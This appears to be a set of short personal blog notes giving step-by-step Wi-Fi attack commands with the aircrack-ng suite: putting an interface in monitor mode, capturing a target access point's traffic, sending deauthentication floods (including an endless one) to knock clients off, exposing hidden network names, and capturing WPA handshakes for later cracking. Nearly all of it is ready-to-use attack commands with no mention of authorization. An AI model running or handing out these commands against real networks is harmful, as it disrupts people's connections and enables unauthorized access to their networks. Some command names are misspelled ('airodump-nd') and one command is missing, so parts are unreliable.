By rbosaz, 27 October, 2022

First identify the target AP's MAC address, then use the following command:

sudo aireplay-ng -0 0 -a <Target AP's MAC> <WLAN Name>

Note: -0 0 will execute deauth to infinity

Websploit is another tool that can be used, but you'll need to install it first.

Using the terminal execute the app as follows.


Available modules can be seen by executing the following.

show modules



By rbosaz, 25 October, 2022

First put WLAN in monitoring mode.

Using the following command, find an AP where its essid is <length:  0>:

airodump-nd <WLAN Name>

Now gather data from the zero length essid AP using the following command:

airodump-ng -c <AP_0 Channel> --bssid <AP_0 MAC> <WLAN Name>

Where: AP_0 = Zero Length AP.

Open up another terminal and disconnect one of the clients attached to the zero length AP:

aireplay-ng -0 3 -a <AP_0 MAC> -c <Client MAC> <WLAN Name>

Once disconnected notice the essid of the AP_0 display a name.


By rbosaz, 25 October, 2022

First get Target AP's client connections using the commands in this reference:

Capture Data from Target AP

Open a second terminal and disconnect a client from the AP by executing the following command. This will allow one to capture the handshake between the AP and client. Handshake will be in the generated pcap file.

aireplay-ng -0 3 -a <Target AP's bssid> -c <Target AP's Client's essid> <wlan name>

Note: the -0 3 is telling the command to execute three times, you can increase the three to a larger value to keep client from reconnecting.

By rbosaz, 25 October, 2022

Once you find an AP target execute the following command to capture data from the AP:

sudo airodump-ng --channel <Target AP's Channel> --bssid <Target AP's MAC> --write <Output File Name> <Your WLAN Name>

You can quit using ctrl+c or hitting 'q' twice.

The above command will create the following files:

  • <Output File Name>.csv
  • <Output File Name>.pcap: this file will have the handshake information
  • <Output File Name>.kismet.csv
  • <Output File Name>.kismet.netxml
By rbosaz, 25 October, 2022

When sniffing for AP's gather the following AP information before cracking:

  • BSSID: MAC address of the network.
  • CHANNEL: The Channel that the network is running on.
  • ENC: The encryption type.
  • ESSID: The name of the network.

Setup WiFi in monitoring mode:

ifconfig <wlan name> down
sudo airmon-ng start <wlan name>
verify via iwconfig

Capture other AP's, using the following command:

sudo airodump-nd <wlan name>

If you wish to sniff a specific band (a, b or g) add --band parameter after the interface name. Note: b and g use 2.4Ghz and a uses 5Ghz